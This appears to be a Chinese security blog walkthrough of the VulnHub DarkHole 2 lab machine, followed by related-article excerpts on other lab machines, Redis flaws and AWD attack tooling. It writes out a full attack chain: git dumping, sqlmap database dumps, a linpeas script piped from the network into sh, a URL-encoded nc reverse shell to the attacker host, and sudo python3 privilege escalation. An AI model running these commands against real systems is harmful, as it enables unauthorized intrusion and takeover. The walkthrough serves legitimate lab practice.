vulnhub之darkhole2的实践

VSole2022-07-10 15:32:30

今天实践的是vulnhub的darkhole2镜像,

下载地址,https://download.vulnhub.com/darkhole/darkhole_2.zip,

用workstation导入成功,地址扫描得到有效地址,

sudo netdiscover -r 192.168.58.0/24,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.138,

浏览器访问找到登录入口,

浏览器访问端口扫描到的git路径,192.168.58.138:80/.git/,

用gitdumper对git目录进行信息收集,

git clone https://github.com/arthaud/git-dumper.git,

cd git-dumper,mkdir backup,

python3 git_dumper.py http://192.168.58.138/.git/ backup,

cd backup,git log,

git diff a4d900a8d85e8938d3601f3cef113ee293028e10,

获取到账号密码,lush@admin.com/321,

登录之前找到的入口,猜测是sql注入点,

用burpsuite截取cookie信息,

把请求保存到本地sql文件,

用sqlmap进行爆破,sqlmap -r sql --dbs --batch,获取到数据库,

继续对darkhole_2数据库爆破,

sqlmap -r sql -D darkhole_2 --dump-all --batch,

获取到账号密码,jehad/fool,

ssh登录,ssh jehad@192.168.58.138,不是root,需要继续提权,

下载linpeas.sh查找提权信息,cd /tmp,

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh,

获取到losy用户在本地9999端口开了php服务,

查看php服务文件发现提供了命令执行能力,

外面无法直接访问,就通过ssh做一个通道,

ssh jehad@192.168.58.138 -L 9999:localhost:9999,

做一个反弹shell的命令,用burpsuite编码,

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.58.131 8888 >/tmp/f,

在kali攻击机上开一个nc监听,nc -lvp 8888,

带着反弹shell命令访问php服务,

http://127.0.0.1:9999/?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%35%38%2e%31%33%31%20%38%38%38%38%20%3e%2f%74%6d%70%2f%66,

反弹shell就过来了,

转成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',

查看losy用户home目录,cd /home/losy,

cat .bash_history,获取到账号密码,losy/gang,

sudo -l发现python3就有root权限,重新获取shell,

sudo python3 -c 'import pty; pty.spawn("/bin/bash")',确认是root,

shellpython3
本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhub之Chili的实践
2023-01-03 09:12:49
vulnhub之Chili的实践
vulnhub之Bellatrix的实践
2022-07-30 13:33:28
今天实践的是vulnhub的Bellatrix镜像,下载地址,https://download.vulnhu
vulnhub之darkhole2的实践
2022-07-10 15:32:30
今天实践的是vulnhub的darkhole2镜像,下载地址,https://download.vulnhu
vulnhub之ha-natraj的实践
2023-05-29 15:40:49
今天实践的是vulnhub的ha-natraj镜像,下载地址,https://download.vulnhu
实战打靶之Obscurity
2022-11-24 13:50:00
访问其8080端口,发现是一个web界面。浏览页面内容,提升有一些提示。发现提示是4042.目录爆破使用gobuster进行目录爆破。gobuster dir-u http://10.10.10.168:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt ,发现都是404.3.使用wfuzz进行fuzz由于我们不知道文件存放在那个具体路径下,所以将使用wfuzzurl 来定位http://10.10.10.168:8080/FUZZ/SuperSecureServer.py其路径。wfuzz -c-w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py --hl 6 --hw 367发现它在/developer目录之下。成功看到脚本内容。"400": "BAD REQUEST", "401": "UNAUTHORIZED", "403": "FORBIDDEN", "404": "NOT FOUND",
情景一 默认SSH密码批量反弹shell 情景二 dump源码 情景三 利用shell批量getflag 情景四 批量利用一句话木马种植不死马 最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用
Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-
实战打靶系列第?靶机的ip:192.168.56.105kali的ip:192.168.56.103
靶机Agile补充图片
2023-03-22 10:04:15
Nmap done: 1 IP address scanned in 171.68 seconds. 添加host└─# echo "10.10.11.203 superpass.htb" >> /etc/hosts. 注册个账号就读取了。我们可以在 python 中创建一个脚本,自动实现这个过程,只需要输入的文件路径└─# cat lfi.py. data = {"username": "123", "password": "123", "submit": ""}
Redis系列漏洞总结
2023-06-19 10:29:18
前言Redis的未授权漏洞一直都是一个很火的漏洞,最近看许多前辈的文章自己复现后,根据自己的实践再次总结一下,为日后复习方便回顾。Redis简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。
VSole
网络安全专家